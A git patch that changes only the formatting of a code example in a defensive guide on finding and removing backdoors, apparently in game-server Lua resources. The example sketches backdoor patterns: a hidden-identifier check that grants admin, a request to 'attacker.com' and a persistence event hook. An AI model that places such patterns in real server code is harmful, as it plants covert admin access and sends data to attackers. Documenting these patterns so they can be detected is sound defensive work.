From 00f4a330160f29afa0185448c2f8c865730cca94 Mon Sep 17 00:00:00 2001
From: Pixelated <hey@codemeapixel.dev>
Date: Wed, 18 Feb 2026 16:45:52 -0700
Subject: [PATCH] Update common-threats.mdx

---
 content/docs/guides/common-threats.mdx | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/content/docs/guides/common-threats.mdx b/content/docs/guides/common-threats.mdx
index 1265e3b..29ed31e 100644
--- a/content/docs/guides/common-threats.mdx
+++ b/content/docs/guides/common-threats.mdx
@@ -189,7 +189,7 @@ Once you've identified a backdoor, thorough removal is critical because backdoor
       title: "Identify All Backdoor Components",
       description:
         "Don't just remove one suspicious resource or file. Backdoors are typically multi-layered. A single malicious resource might create database accounts, add hidden admin users, and place files in multiple locations. Finding one component should trigger a comprehensive search for others.",
-      code: "-- Common backdoor patterns to search for:\n-- Hidden identifiers that grant permissions\nif identifier == 'hidden-admin-identifier' then\n  grantAdmin(source)\nend\n\n-- External communication\nHttpsRequest({url = 'http://attacker.com/...'})\n\n-- Resource restart immunity\nAddEventHandler('onServerResourceStart', function()\n  -- Persistence code\nend)",
+      code: "-- Common backdoor patterns to search for:\n\n-- Hidden identifiers that grant permissions\n\nif identifier == 'hidden-admin-identifier' then\n\ngrantAdmin(source)\nend\n\n\n-- External communication\n\nHttpsRequest({url = 'http://attacker.com/...'})\n\n\n-- Resource restart immunity\n\nAddEventHandler('onServerResourceStart', function()\n\n  -- Persistence code\nend)",
     },
     {
       title: "Remove the Backdoor",